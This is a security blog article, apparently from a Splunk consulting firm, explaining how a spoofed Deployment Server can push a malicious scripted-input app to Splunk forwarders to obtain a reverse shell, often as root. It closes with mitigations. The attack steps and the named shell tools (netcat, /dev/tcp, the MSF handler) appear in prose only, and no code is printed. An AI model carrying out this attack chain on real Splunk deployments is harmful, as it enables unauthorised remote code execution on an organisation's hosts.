Exploiting Scripted and Modular Inputs
Splunk scripted and modular inputs are a powerful tool when leveraged properly, allowing a user to run a script on a remote endpoint and log stdout returned by the script to Splunk, or trigger an alert action. Splunk also provides a simple configuration distribution facility in the form of Deployment Server.
When these two are combined and utilized maliciously, they become an open door for an attacker to gain access to any system running a Splunk daemon that is connected to a Deployment Server and execute arbitrary code as the user running the Splunk daemon.
This document seeks to explain the extent of the vulnerability, demonstrate how to exploit this known vulnerability in a distributed Splunk environment managed by a Deployment Server, as well as discuss some possible mitigation steps for this Splunk vulnerability.
To fully understand this document, we assume you possess the following skills:
- A working understanding of Splunk architecture and basic utilization
- Understanding of security concepts such as ARP-spoofing and DNS Poisoning
- Basic understanding of networking fundamentals
At this point in time, most organizations employ some form of log management tool or SIEM solution. For the purposes of this document, our victim has Splunk deployed in their organization. With the increased utilization of Splunk in the security space, a number of concerns have been raised regarding the amount of permissions accessible to an application utilizing a modular or scripted input. Splunk perhaps didn’t expect what naturally occurs within our community, which is that we see an issue and work to figure out what can be done with that issue. These input types are extremely powerful when properly utilized for the purpose they were initially intended for, but as with all things, once you move out of scope of the intended use, the fun begins. One critical source of concern is the level of ease and access allowed an insider if these methods are employed. We would all love to believe our security infrastructure is robust, but how many companies do you know that look for exploitation and misuse of those very services/applications/servers that have been purchased to protect?
The environment utilized for the PoC for this known Splunk vulnerability consists of the following devices
- 10 indexers running Splunk 6.4.3
- 1 Search head running Splunk 6.4.3
- Deployment Server running Splunk 6.4.3
- Unknown number of remote forwarders running the Splunk Universal Forwarder 6.4.3 package
The first step towards achieving the goal of remote command execution through a remote Splunk endpoint is to create our “weaponized” scripted input application. We will be using this application for the purpose of this article.
To proceed further than this we will need to utilize our understanding of how Splunk works to find our appropriate attack vector.
As we can see from this diagram from Splunk’s own documentation, the deployment server (DS) has a lot of power for what servers and endpoints it can control. The DS is OS independent meaning it can control endpoints regardless of host OS. That having been said it can only make modifications to files within $SPLUNK_HOME.
To leverage this unprecedented level of access we need to become the DS. Assuming we are already in the network, this can be done a number of ways.
- Leverage the Splunk RESTapi to repoint the deployment client to an attacker controlled DS
- ARP spoof in the network to “become” the router and MITM the DS Client <-> DS instructions
- DNS Poison the network to become the DS
In this document will will be assuming the DNS poisoning method has been used successfully, and that we are now the deployment server in the eyes of the network devices. At this point we will want to have a Splunk instance of our own running and configured to act as a DS so that we can now control the deployment clients (remote devices).
Once we have established our role as the malicious Deployment Server, we can start writing a new serverclass to push out our application. The code in image to the right will suffice for our purposes, but now we have to make a decision. Do we want to be easily detectable and destructive, or do we want to maintain some level of anonymity? Your answer to this question is what pivots the direction you will need to take post compromise. If you are not worried about detection, use the shells created to the remote devices and wait for your back-connect shell to pop and claim your prize.
Creating the Listener:
We have now successfully pushed our shell app out to the remote devices. We are going to need to create a handler for the back-connect to communicate with. To do this you can use netcat, raw sockets in /dev/tcp, or even the MSF reverse_tcp exploit handler. This document will cover the use of netcat.
Using the commands and configuration above, we will now have an active listener ready to accept connections. Once the app has been pushed to the endpoints, the python code will be executed. When the python code is executed, our listener will catch the outbound connection from the remote machine and spawn a shell as the user running Splunk. In a properly set up environment this would be the non-privileged “splunk” user. In practice however, sysadmins can be lazy and do not want to deal with ACL’s to allow Splunk to access files in /var/log. As a result, most times the Splunk universal forwarder is running as root, and as a result, you have just gained full root execution.
The figure below illustrates a successful exploitation of this known Splunk vulnerability:
As you can see above, the scripted/modular input in Splunk is a very powerful tool, but in the wrong hands can be a devastating pivot.
The best method of damage mitigation here would be to ensure that your Splunk installs are running as non-privileged users, but that still doesn’t address the issue as a whole. The app we used was approved by Splunk’s app store “Splunkbase” for public consumption, it is clear that as of this point, Splunk has not received the pressure necessary to begin taking the security stance of their products as seriously as perhaps they should. The application was then later removed when the situation gained notoriety. However, it is still publicly available on Github, and can be pushed to any Splunk endpoint through either the DS or a cluster master if you want to push it to all clustered indexers.
Splunk needs to take action with their core product if this is ever going to be handled. One such method of remediation would be to enable strong SSL authentication of the Deployment Server by the DS clients, reducing the possibility of a potential MITM or spoof. Another option would be requiring apps be “digitally signed” by Splunk to allow the modular/scripted input in an app to have execution permissions. A proper digital signature approach would greatly increase the attacker’s difficultly level, even if they managed to take over the production Deployment Server.
The information contained in this paper is provided by the author, and is provided for educational and informational purposes only. The author accepts no liability for any misuse or malicious use of this information.
Aditum is a Splunk consulting firm focused on Splunk professional services including Splunk deployment, ongoing Splunk administration and Splunk development. Aditum has a separate division that also offers Splunk recruitment and the placement of Splunk professionals into direct-hire (FTE) roles for those companies that may require assistance with acquiring their own full-time staff, given the challenge that currently exists in the market today.
Contact us to learn more.
- Splunk Hiring: You’re Being Duped and You Don’t Even Know It - April 27, 2018
- Configuring Splunk SAML Without SAML Authorization Data - December 7, 2016
- Key Takeaways from Splunk’s 2016 Annual Conference - November 21, 2016